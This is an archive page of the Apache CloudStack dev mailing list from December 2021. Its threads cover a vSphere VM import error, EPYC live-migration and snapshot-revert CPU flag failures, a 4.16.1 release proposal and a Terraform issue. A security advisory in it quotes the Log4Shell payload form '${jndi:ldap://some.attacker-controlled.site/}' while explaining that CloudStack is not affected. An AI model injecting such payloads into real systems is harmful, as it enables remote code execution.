Re: import existing instance from vsphere to cloudstack failed

2021-12-13 Thread Abhishek Kumar
Hi Haven,

From the error, API is failing to find the local storage pool for the volume 
for disk ID: 2-2000. I'm not sure if importing VM with local storage is widely 
tested so there can be an issue there. There could be some difference in pool's 
path as returned by listUnmanagedInstances vs listStoragePools APIs.
Can you please share output of:

  *   listUnmanagedInstances API for the VM
  *   listStoragePools API for the storage pool that corresponds to datastore 
named - localsr1

Regards,
Abhishek

From: haven <382829...@qq.com.INVALID>
Sent: 10 December 2021 22:02
To: dev 
Subject: import existing instance from vsphere to cloudstack failed

Hi devs
    I tried to   import existing instance from vsphere to 
cloudstack failed, this instance use vsphere local storage datastore .already 
enabled localstorage vmware zone and found that localstorage in 
cloudstack,  get same error again。Is there any way to import it normally?


ENV:
Version: cloudstack 4.15.2 
vsphere:6.5


API:
http://x.x.x.x:8090/client/api/?clusterid=8f5efc66-17a9-4f80-925b-92722a04a501&name=localstorage&serviceofferingid=a9544da9-cc83-4ed0-9cf5-52e46f9e9361&command=importUnmanagedInstance&nicnetworklist[0].network=7b0b27c0-7827-4505-9c53-a7969406562b&nicnetworklist[0].nic=%E7%BD%91%E7%BB%9C%E9%80%82%E9%85%8D%E5%99%A8%201&response=json


Error:
{"queryasyncjobresultresponse":{"accountid":"623017de-4b49-11ec-b1af-52540044e80f","userid":"6232957f-4b49-11ec-b1af-52540044e80f","cmd":"org.apache.cloudstack.api.command.admin.vm.ImportUnmanagedInstanceCmd","jobstatus":2,"jobprocstatus":0,"jobresultcode":530,"jobresulttype":"object","jobresult":{"errorcode":530,"errortext":"Storage
 pool for disk 硬盘 1(2-2000) with datastore: localsr1 not found in zone ID: 
db959f5f-2b65-435f-8cd7-2efb7d87c3c7"},"created":"2021-12-10T13:10:29+0800","completed":"2021-12-10T13:10:30+0800","jobid":"2ce8de02-8abc-41ef-acd5-2c205b206598"}}

 



[ADVISORY] CloudStack Advisory on Apache Log4j Zero Day (CVE-2021-44228)

2021-12-13 Thread Rohit Yadav
On 9th December 2021, a new zero-day vulnerability for Apache Log4j
was reported. It is by now tracked under CVE-2021-44228:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228.

CVE-2021-44228 vulnerability is classified under the highest severity
mark and allows an attacker to execute arbitrary code by injecting a
sub-string in the form "${jndi:ldap://some.attacker-controlled.site/}";
into a logged message. Apache Log4j 2.x is reported to be affected as
it performs a lookup (string substitution) using the JNDI protocol,
whenever the "${jndi:...}" string is found within a message parameter.

The Apache Log4j developers [1] and the SLF4J project [2] advisory
confirm that Apache Log4j 1.x does not offer a look-up mechanism and
does not suffer remote code execution (RCE) vulnerability from
CVE-2021-44228.

All Apache CloudStack releases since v4.6 use Apache Log4j version
1.2.17 and therefore are not affected by this RCE vulnerability. Most
users who haven't changed the default log4j xml config don't need to
do anything, advanced users can check and fix their log4j xml
configuration if they're using any custom JMS appenders.

The Apache CloudStack project will consider migrating to a different
version of Apache Log4j in future releases.

[1] https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
[2] http://slf4j.org/log4shell.html

--


Re: Multiple Management Servers Support on agents

2021-12-13 Thread Daan Hoogland
Benoit, you are mostly right in your understanding; the MS load balancing
is implemented in the agent, so won't work on any Xen varieties as these
use an attached agent in the management server itself. This also holds for
all vmware versions.

On Tue, Dec 7, 2021 at 3:07 PM benoit lair  wrote:

> Hello folks,
>
> I am looking after solutions for Ha of mgmt servers
> I would like to avoid use of external load balancer
>
> I see this in doc :
>
> https://docs.cloudstack.apache.org/en/4.16.0.0/adminguide/reliability.html#management-server-load-balancing
> and in the cwiki it talks about KVM agent :
>
> https://cwiki.apache.org/confluence/display/CLOUDSTACK/Multiple+Management+Servers+Support+on+agents
>
> Does this mean it does not work with some Xcp-ng servers ?
> Xcp-ng can't know which mgmt server must be contacted in case of failure ?
>
> Regards, Benoit
>


-- 
Daan


[PROPOSE] RM for 4.16.1

2021-12-13 Thread Suresh Anaparti
Hi All,

I'd like to put myself forward as the release manager for 4.16.1.0. My 
colleague Nicolas Vazquez will support me as the co-RM for the PR 
reviews/tests/merges, and others are welcome to support as well.

I propose, we've a window of at least 8 weeks (2 months) to allow the community 
/ users to test 4.16.0.0 and report issues, and aim to cut RC1 in Q1 2022 (may 
be, in late Feb-2022, or early Mar-2022 onwards). I'll propose the timeline 
details by end of this week. I hope to have your support.

Please let me know if you have any thoughts / comments.


Regards,
Suresh

 



Re: [PROPOSE] RM for 4.16.1

2021-12-13 Thread Katie F.
Thank you. I look forward to the proposal status and hopeful fixes.
~Kathleen Foos

Sent from my iPhone.Kathleen Foos

> On Dec 13, 2021, at 8:10 AM, Suresh Anaparti  
> wrote:
> 
> Hi All,
> 
> I'd like to put myself forward as the release manager for 4.16.1.0. My 
> colleague Nicolas Vazquez will support me as the co-RM for the PR 
> reviews/tests/merges, and others are welcome to support as well.
> 
> I propose, we've a window of at least 8 weeks (2 months) to allow the 
> community / users to test 4.16.0.0 and report issues, and aim to cut RC1 in 
> Q1 2022 (may be, in late Feb-2022, or early Mar-2022 onwards). I'll propose 
> the timeline details by end of this week. I hope to have your support.
> 
> Please let me know if you have any thoughts / comments.
> 
> 
> Regards,
> Suresh
> 
> 
> 


Re: Live migration between AMD Epyc and Ubuntu 18.04 and 20.04

2021-12-13 Thread Marcus
That does sound like some sort of libvirt, then. I don't know why it would
fail to transfer with " unknown CPU feature" when the source VM XML is not
calling for it or a model that would include it.

On Sat, Dec 11, 2021 at 3:32 AM Wido den Hollander  wrote:

>
>
> Op 11-12-2021 om 00:52 schreef Marcus:
> > Just for clarity - Wido you mention that you tried using a common CPU
> model
> > across the platforms (which presumably doesn't contain npt) but migration
> > still fails on npt missing. That does seem like a bug of some sort, I
> would
> > expect that the the following should work:
> >
>
> Indeed, that failed.
>
> > * Update cloudstack agent configs to use 'EPYC-IBPB' common identical
> > model, restart agent
> > * Stop VM on source host (ubuntu 20.04)
> > * Start VM on source host (ubuntu 20.04) - at this point you should not
> > have a feature 'npt' in the XML of the running VM. If you do then there's
> > something wrong with the EPYC-IBPB or libvirt's interpretation
> > * Attempt to migrate to destination host (ubuntu 18.04)
> >
> > Is this process failing? Just want to ensure the source VM was restarted
> > and does not contain npt in the XML (and also on the resulting qemu
> command
> > line), but still the migration complains about missing that feature.
> >
>
> I tried with EPYC-IBPB as well and restarted the VM prior to the migration.
>
> 20.04 -> 18.04 fails even though the IBPB model in libvirt is exactly
> the same between 18 and 20.
>
> It complains about the npt feature lacking and thus the migration fails.
>
> > I'm also making an assumption here that /proc/cpuinfo on an Epyc 7552
> does
> > not have npt, but an Epyc 7662 does. Is that correct?
> >
>
> Correct.
>
> > On Tue, Dec 7, 2021 at 6:46 AM Gabriel Bräscher 
> > wrote:
> >
> >> Paul, I confused the issues then.
> >>
> >> The one I mentioned fits only with what Wido reported in this thread.
> >> The CPU flag matches with the ones raised on that bug. Flags like *npt*
> &
> >> *nrip-save* which are present when SVM is enabled.
> >> Therefore, affected by kernel commit -- 52297436199d ("kvm: svm: Update
> >> svm_xsaves_supported").
> >> Additionally, the OS/Qemu versions also do fit with what is reported on
> >> Ubuntu' qemu package "bug #1887490".
> >>
> >> Regards
> >>
> >> On Tue, Dec 7, 2021 at 12:10 PM Paul Angus 
> >> wrote:
> >>
> >>> The qemu-ev 2.10 bug was first reported a year or two ago in the
> mailing
> >>> lists.
> >>>
> >>> -Original Message-
> >>> From: Gabriel Bräscher 
> >>> Sent: Tuesday, December 7, 2021 9:41 AM
> >>> To: dev 
> >>> Subject: Re: Live migration between AMD Epyc and Ubuntu 18.04 and 20.04
> >>>
> >>> Just adding to the "qemu-ev 2.10" & "qemu-ev 2.12" point.
> >>>
>  migration fails from qemu-ev 2.10 to qemu-ev 2.12, this is definitely
>  a bug in my point of view.
> 
> >>>
> >>> On the comment 53 (at "bug #1887490"):
> >>>
>  It seems *one of the patches also introduced a regression*:
>  * lp-1887490-cpu_map-Add-missing-AMD-SVM-features.patch
>  adds various SVM-related flags. Specifically *npt and nrip-save are
>  now expected to be present by default* as shown in the updated
> >> testdata.
>  This however breaks migration from instances using EPYC or EPYC-IBPB
>  CPU models started with libvirt versions prior to this one because the
>  instance on the target host has these extra flags
> >>>
> >>>
> >>>  From the tests reported there, it fails in both ways.
> >>> 1. From *older* qemu package to *newer*:
> >>>  *source* host does not map the CPU flag; however, *target* host
> >>> expects the flag to be there, by default.
> >>> 2. From *newer* qemu package to *older*:
> >>>  the instance "domain.xml" in the *source* host has a CPU flag
> that is
> >>> not mapped by qemu in the *target* host.
> >>>
> >>>
> >>>
> >>> On Tue, Dec 7, 2021 at 10:22 AM Sven Vogel  wrote:
> >>>
>  Let me check. We had the same problem on RHEL/CentOS but I am not sure
>  if this a bug. What I know there was a change in the XML. Let me ask
>  one on my colleges in my team.
> 
>  😉
> 
> 
>  __
> 
>  Sven Vogel
>  Senior Manager Research and Development - Cloud and Infrastructure
> 
>  EWERK DIGITAL GmbH
>  Brühl 24, D-04109 Leipzig
>  P +49 341 42649 - 99
>  F +49 341 42649 - 98
>  s.vo...@ewerk.com
>  www.ewerk.com
> 
>  Geschäftsführer:
>  Dr. Erik Wende, Hendrik Schubert, Tassilo Möschke
>  Registergericht: Leipzig HRB 9065
> 
>  Support:
>  +49 341 42649 555
> 
>  Zertifiziert nach:
>  ISO/IEC 27001:2013
>  DIN EN ISO 9001:2015
>  DIN ISO/IEC 2-1:2018
> 
>  ISAE 3402 Typ II Assessed
> 
>  EWERK-Blog | LinkedIn<
>  https://www.linkedin.com/company/ewerk-group> | Xing<
>  https://www.xing.com/company/ewerk> | Twitter<
>  https://twitter.com/EWERK_Group> | Facebook<
>  https://de-de.facebook.co

Re: Live migration between AMD Epyc and Ubuntu 18.04 and 20.04

2021-12-13 Thread Marcus
Sorry, just piecing this together and looking at things that have probably
already been looked at!

Looking at the Libvirt CPU xml files, it's interesting that both
x86_EPYC-Milan.xml

 and x86_EPYC-Rome.xml

have
'npt', I guess the Ubuntu kernel on 18.04 doesn't support npt, you'd see
the difference under the host XML in 'virsh capabilities' command.

This would be similar to the 'vmx' flag for nested virtualization. You
won't find the 'vmx' capability in any of the CPU XML, however if you
enable it via kvm module parameter the VM gets it, and then you can't
migrate to non-vmx hosts even with the same CPU.  If something like this
were happening though I'd still expect to see 'npt' in the source VM XML
and on its qemu command unless it's similar but not quite the same issue.

On Mon, Dec 13, 2021 at 10:32 AM Marcus  wrote:

> That does sound like some sort of libvirt, then. I don't know why it would
> fail to transfer with " unknown CPU feature" when the source VM XML is
> not calling for it or a model that would include it.
>
> On Sat, Dec 11, 2021 at 3:32 AM Wido den Hollander  wrote:
>
>>
>>
>> Op 11-12-2021 om 00:52 schreef Marcus:
>> > Just for clarity - Wido you mention that you tried using a common CPU
>> model
>> > across the platforms (which presumably doesn't contain npt) but
>> migration
>> > still fails on npt missing. That does seem like a bug of some sort, I
>> would
>> > expect that the the following should work:
>> >
>>
>> Indeed, that failed.
>>
>> > * Update cloudstack agent configs to use 'EPYC-IBPB' common identical
>> > model, restart agent
>> > * Stop VM on source host (ubuntu 20.04)
>> > * Start VM on source host (ubuntu 20.04) - at this point you should not
>> > have a feature 'npt' in the XML of the running VM. If you do then
>> there's
>> > something wrong with the EPYC-IBPB or libvirt's interpretation
>> > * Attempt to migrate to destination host (ubuntu 18.04)
>> >
>> > Is this process failing? Just want to ensure the source VM was restarted
>> > and does not contain npt in the XML (and also on the resulting qemu
>> command
>> > line), but still the migration complains about missing that feature.
>> >
>>
>> I tried with EPYC-IBPB as well and restarted the VM prior to the
>> migration.
>>
>> 20.04 -> 18.04 fails even though the IBPB model in libvirt is exactly
>> the same between 18 and 20.
>>
>> It complains about the npt feature lacking and thus the migration fails.
>>
>> > I'm also making an assumption here that /proc/cpuinfo on an Epyc 7552
>> does
>> > not have npt, but an Epyc 7662 does. Is that correct?
>> >
>>
>> Correct.
>>
>> > On Tue, Dec 7, 2021 at 6:46 AM Gabriel Bräscher 
>> > wrote:
>> >
>> >> Paul, I confused the issues then.
>> >>
>> >> The one I mentioned fits only with what Wido reported in this thread.
>> >> The CPU flag matches with the ones raised on that bug. Flags like
>> *npt* &
>> >> *nrip-save* which are present when SVM is enabled.
>> >> Therefore, affected by kernel commit -- 52297436199d ("kvm: svm: Update
>> >> svm_xsaves_supported").
>> >> Additionally, the OS/Qemu versions also do fit with what is reported on
>> >> Ubuntu' qemu package "bug #1887490".
>> >>
>> >> Regards
>> >>
>> >> On Tue, Dec 7, 2021 at 12:10 PM Paul Angus 
>> >> wrote:
>> >>
>> >>> The qemu-ev 2.10 bug was first reported a year or two ago in the
>> mailing
>> >>> lists.
>> >>>
>> >>> -Original Message-
>> >>> From: Gabriel Bräscher 
>> >>> Sent: Tuesday, December 7, 2021 9:41 AM
>> >>> To: dev 
>> >>> Subject: Re: Live migration between AMD Epyc and Ubuntu 18.04 and
>> 20.04
>> >>>
>> >>> Just adding to the "qemu-ev 2.10" & "qemu-ev 2.12" point.
>> >>>
>>  migration fails from qemu-ev 2.10 to qemu-ev 2.12, this is definitely
>>  a bug in my point of view.
>> 
>> >>>
>> >>> On the comment 53 (at "bug #1887490"):
>> >>>
>>  It seems *one of the patches also introduced a regression*:
>>  * lp-1887490-cpu_map-Add-missing-AMD-SVM-features.patch
>>  adds various SVM-related flags. Specifically *npt and nrip-save are
>>  now expected to be present by default* as shown in the updated
>> >> testdata.
>>  This however breaks migration from instances using EPYC or EPYC-IBPB
>>  CPU models started with libvirt versions prior to this one because
>> the
>>  instance on the target host has these extra flags
>> >>>
>> >>>
>> >>>  From the tests reported there, it fails in both ways.
>> >>> 1. From *older* qemu package to *newer*:
>> >>>  *source* host does not map the CPU flag; however, *target* host
>> >>> expects the flag to be there, by default.
>> >>> 2. From *newer* qemu package to *older*:
>> >>>  the instance "domain.xml" in the *source* host has a CPU flag
>> that is
>> >>> not mapped by qemu in the *target* host.
>> >>>
>> >>>
>> >>>
>> >>> On Tue, Dec 7, 2021 at 10:22 AM Sve

Reverting to VM Snapshots fail if VM is powered off+on

2021-12-13 Thread Sean Lair
We are seeing a strange problem in our ACS environments.  We are running 
Centos7 as our hypervisors.  When we take a VM Snapshot and then later revert 
to it, it works as long as we haven't stopped and started the VM.  If we stop 
the VM and start it again - even if it is still on the same host - we cannot 
revert back to a VM Snapshot.  Here is the error and further information.   Any 
ideas?  It is 100% reproducible for us.


2021-12-13 22:50:51,731 DEBUG [c.c.a.t.Request] (AgentManager-Handler-12:null) 
(logid:) Seq 101-5603885311332466879: Processing:  { Ans: , MgmtId: 
345051498372, via: 101, Ver: v1, Flags: 10, 
[{"com.cloud.agent.api.RevertToVMSnapshotAnswer":{"result":false,"details":" 
Revert to VM snapshot failed due to org.libvirt.LibvirtException: revert 
requires force: Target CPU feature count 3 does not match source 0","wait":0}}] 
}
2021-12-13 22:50:51,732 ERROR [o.a.c.s.v.DefaultVMSnapshotStrategy] 
(Work-Job-Executor-64:ctx-1767fb85 job-130106/job-130111 ctx-ab4680c7) 
(logid:87cc475a) Revert VM: i-2-317-VM to snapshot: 
i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot failed due to 
org.libvirt.LibvirtException: revert requires force: Target CPU feature count 3 
does not match source 0
com.cloud.utils.exception.CloudRuntimeException: Revert VM: i-2-317-VM to 
snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot 
failed due to org.libvirt.LibvirtException: revert requires force: Target CPU 
feature count 3 does not match source 0
2021-12-13 22:50:51,743 ERROR [c.c.v.VmWorkJobHandlerProxy] 
(Work-Job-Executor-64:ctx-1767fb85 job-130106/job-130111 ctx-ab4680c7) 
(logid:87cc475a) Invocation exception, caused by: 
com.cloud.utils.exception.CloudRuntimeException: Revert VM: i-2-317-VM to 
snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot 
failed due to org.libvirt.LibvirtException: revert requires force: Target CPU 
feature count 3 does not match source 0
2021-12-13 22:50:51,743 INFO  [c.c.v.VmWorkJobHandlerProxy] 
(Work-Job-Executor-64:ctx-1767fb85 job-130106/job-130111 ctx-ab4680c7) 
(logid:87cc475a) Rethrow exception 
com.cloud.utils.exception.CloudRuntimeException: Revert VM: i-2-317-VM to 
snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot 
failed due to org.libvirt.LibvirtException: revert requires force: Target CPU 
feature count 3 does not match source 0
com.cloud.utils.exception.CloudRuntimeException: Revert VM: i-2-317-VM to 
snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to VM snapshot 
failed due to org.libvirt.LibvirtException: revert requires force: Target CPU 
feature count 3 does not match source 0
Caused by: com.cloud.utils.exception.CloudRuntimeException: Revert VM: 
i-2-317-VM to snapshot: i-2-317-VM_VS_20211213224802 failed due to  Revert to 
VM snapshot failed due to org.libvirt.LibvirtException: revert requires force: 
Target CPU feature count 3 does not match source 0


[root@labcloudkvm02 ~]# virsh dumpxml 33
...
  
IvyBridge



  
...


[root@labcloudkvm02 ~]# virsh dumpxml 33 --migratable
...
  
IvyBridge
  
...


[root@labcloudkvm02 ~]# virsh snapshot-dumpxml 33 i-2-317-VM_VS_20211213224802
...

  IvyBridge
  
  
  

...

In agent.properties:
guest.cpu.model=IvyBridge
guest.cpu.mode=custom


Re: [PROPOSE] RM for 4.16.1

2021-12-13 Thread Harikrishna Patnala
Thank you and good luck Suresh, Nicolas.

Regards,
Harikrishna

From: Suresh Anaparti 
Sent: Monday, December 13, 2021 6:39 PM
To: dev@cloudstack.apache.org 
Cc: us...@cloudstack.apache.org 
Subject: [PROPOSE] RM for 4.16.1

Hi All,

I'd like to put myself forward as the release manager for 4.16.1.0. My 
colleague Nicolas Vazquez will support me as the co-RM for the PR 
reviews/tests/merges, and others are welcome to support as well.

I propose, we've a window of at least 8 weeks (2 months) to allow the community 
/ users to test 4.16.0.0 and report issues, and aim to cut RC1 in Q1 2022 (may 
be, in late Feb-2022, or early Mar-2022 onwards). I'll propose the timeline 
details by end of this week. I hope to have your support.

Please let me know if you have any thoughts / comments.


Regards,
Suresh




 



Re: [PROPOSE] RM for 4.16.1

2021-12-13 Thread Rohit Yadav
Sounds good to me, thanks for volunteering Suresh.

Regards.

From: Harikrishna Patnala 
Sent: Tuesday, December 14, 2021 9:34:43 AM
To: dev@cloudstack.apache.org ; 
us...@cloudstack.apache.org 
Subject: Re: [PROPOSE] RM for 4.16.1

Thank you and good luck Suresh, Nicolas.

Regards,
Harikrishna

From: Suresh Anaparti 
Sent: Monday, December 13, 2021 6:39 PM
To: dev@cloudstack.apache.org 
Cc: us...@cloudstack.apache.org 
Subject: [PROPOSE] RM for 4.16.1

Hi All,

I'd like to put myself forward as the release manager for 4.16.1.0. My 
colleague Nicolas Vazquez will support me as the co-RM for the PR 
reviews/tests/merges, and others are welcome to support as well.

I propose, we've a window of at least 8 weeks (2 months) to allow the community 
/ users to test 4.16.0.0 and report issues, and aim to cut RC1 in Q1 2022 (may 
be, in late Feb-2022, or early Mar-2022 onwards). I'll propose the timeline 
details by end of this week. I hope to have your support.

Please let me know if you have any thoughts / comments.


Regards,
Suresh







 



?????? import existing instance from vsphere to cloudstack failed

2021-12-13 Thread haven
Hi Abhishek
     Thanks for your reply , info below:



 listUnmanagedInstances API for the VM

{"listunmanagedinstancesresponse":{"count":2,"unmanagedinstance":[{"name":"vc01","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","hostid":"a75916bf-eb08-45cd-9101-7a2cabf06d6e","powerstate":"PowerOn","cpunumber":4,"cpucorepersocket":1,"cpuspeed":0,"memory":8192,"osid":"windows8Server64Guest","osdisplayname":"Microsoft
 Windows Server 2012 (64 ??)","disk":[{"id":"1-2000","label":" 
1","capacity":53687091200,"imagepath":"[localsr1] 
acs/acs.vmdk","controller":"lsisas1068","controllerunit":0,"position":0,"datastorename":"localsr1"}],"nic":[{"id":"??
 1","networkname":"VM 
Network","macaddress":"00:0c:29:62:31:ad","vlanid":0,"adaptertype":"E1000"}]},{"name":"localstorage","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","hostid":"a75916bf-eb08-45cd-9101-7a2cabf06d6e","powerstate":"PowerOn","cpunumber":1,"cpucorepersocket":1,"cpuspeed":0,"memory":2048,"osid":"centos7_64Guest","osdisplayname":"CentOS
 7 (64 ??)","disk":[{"id":"2-2000","label":" 
1","capacity":17179869184,"imagepath":"[localsr1] 
localstorage/localstorage.vmdk","controller":"pvscsi","controllerunit":0,"position":0,"datastorename":"localsr1"}],"nic":[{"id":"??
 1","macaddress":"00:50:56:b4:fa:53","adaptertype":"Vmxnet3"}]}]}}



listStoragePools

{"liststoragepoolsresponse":{"count":5,"storagepool":[{"id":"a8eab88e-b302--92d1-04e3b83d47b7","zoneid":"db959f5f-2b65-435f-8cd7-2efb7d87c3c7","zonename":"vmware01","podid":"dd8a1ce9-f16b-4de2-9441-7baa3e26ecd8","podname":"vmwarepod","name":"datastore1","ipaddress":"VMFS
 datastore: 
datastore-10","path":"datastore-10","created":"2021-12-09T10:28:07+0800","type":"VMFS","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","clustername":"10.226.18.132/Datacenter1/cl01","disksizetotal":118648471552,"disksizeallocated":0,"disksizeused":7552892928,"state":"Up","scope":"HOST","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}},{"id":"a34f25c3-3452-3441-828c-302a2c6f7f03","zoneid":"db959f5f-2b65-435f-8cd7-2efb7d87c3c7","zonename":"vmware01","podid":"dd8a1ce9-f16b-4de2-9441-7baa3e26ecd8","podname":"vmwarepod","name":"nfs1","ipaddress":"10.226.18.132","path":"/Datacenter1/nfs1","created":"2021-12-08T15:05:34+0800","type":"NFS","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","clustername":"10.226.18.132/Datacenter1/cl01","disksizetotal":11005929193472,"disksizeallocated":34365323222,"disksizeused":195802693632,"state":"Up","scope":"CLUSTER","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}},{"id":"f42dea39-fa23-3e27-9062-45381b9cc1c7","zoneid":"db959f5f-2b65-435f-8cd7-2efb7d87c3c7","zonename":"vmware01","podid":"dd8a1ce9-f16b-4de2-9441-7baa3e26ecd8","podname":"vmwarepod","name":"nfs2","ipaddress":"10.226.18.132","path":"/Datacenter1/nfs2","created":"2021-12-08T13:55:49+0800","type":"NFS","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","clustername":"10.226.18.132/Datacenter1/cl01","disksizetotal":11005933387776,"disksizeallocated":4194304000,"disksizeused":195802693632,"state":"Up","scope":"CLUSTER","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}},{"id":"44069041-572d-32b0-abc4-745b97eae508","zoneid":"690eaa87-5228-4192-a388-ea250b58d963","zonename":"uat","podid":"f0a0d079-2944-45bd-8c77-b60b09330eff","podname":"SP01","name":"Ceph
 
RBD","ipaddress":"10.100.250.11,10.100.250.12,10.100.250.13","path":"rbd","created":"2021-11-22T12:22:40+0800","type":"RBD","clusterid":"d384ab7a-1377-4371-b444-e0d7150536d6","clustername":"defaultGroupName","disksizetotal":36332551200768,"disksizeallocated":4691748454400,"disksizeused":1808940470272,"state":"Up","scope":"CLUSTER","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}},{"id":"89f42f77-6c2b-4bd6-885c-4bb24a09366c","zoneid":"db959f5f-2b65-435f-8cd7-2efb7d87c3c7","zonename":"vmware01","podid":"dd8a1ce9-f16b-4de2-9441-7baa3e26ecd8","podname":"vmwarepod","name":"localsr1","ipaddress":"VMFS
 datastore: 
datastore-11","path":"datastore-11","created":"2021-12-09T10:28:07+0800","type":"VMFS","clusterid":"8f5efc66-17a9-4f80-925b-92722a04a501","clustername":"10.226.18.132/Datacenter1/cl01","disksizetotal":4000762036224,"disksizeallocated":0,"disksizeused":83411075072,"state":"Up","scope":"HOST","overprovisionfactor":"2.0","provider":"DefaultPrimary","storagecapabilities":{"VOLUME_SNAPSHOT_QUIESCEVM":"false"}}]}}


--  --
??: 
   "dev"

http://x.x.x.x:8090/client/api/?clusterid=8f5efc66-17a9-4f80-925b-92722a04a501&name=localstorage&serviceofferingid

[GitHub] [cloudstack-terraform-provider] harikrishna-patnala commented on issue #17: Removing an ACL list from a network corrupts state file

2021-12-13 Thread GitBox


harikrishna-patnala commented on issue #17:
URL: 
https://github.com/apache/cloudstack-terraform-provider/issues/17#issuecomment-993246719


   @synergiator, may I know what is the exact configuration that you are using. 
 When I tried creating VPC and tier in it having ACL ID and then removing ACL 
ID from that tier, these steps worked fine.
   
   ```
   -/+ resource "cloudstack_network" "tier1" {
 ~ acl_id   = "59d048bb-8329-4817-9124-972a91743778" -> "none" 
# forces replacement
   
   ```
   upon removing acl_id from the resource or setting "acl_id = null", both 
resulted in above operation and they are successful.
   
   May I know what configuration and what change in the configuration triggered 
your error.
   ```
   
   module.vpc.cloudstack_network.private[0] will be updated in-place
 ~ resource "cloudstack_network" "private" {
 - acl_id   = "none" -> null
   ```


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: dev-unsubscr...@cloudstack.apache.org

For queries about this service, please contact Infrastructure at:
us...@infra.apache.org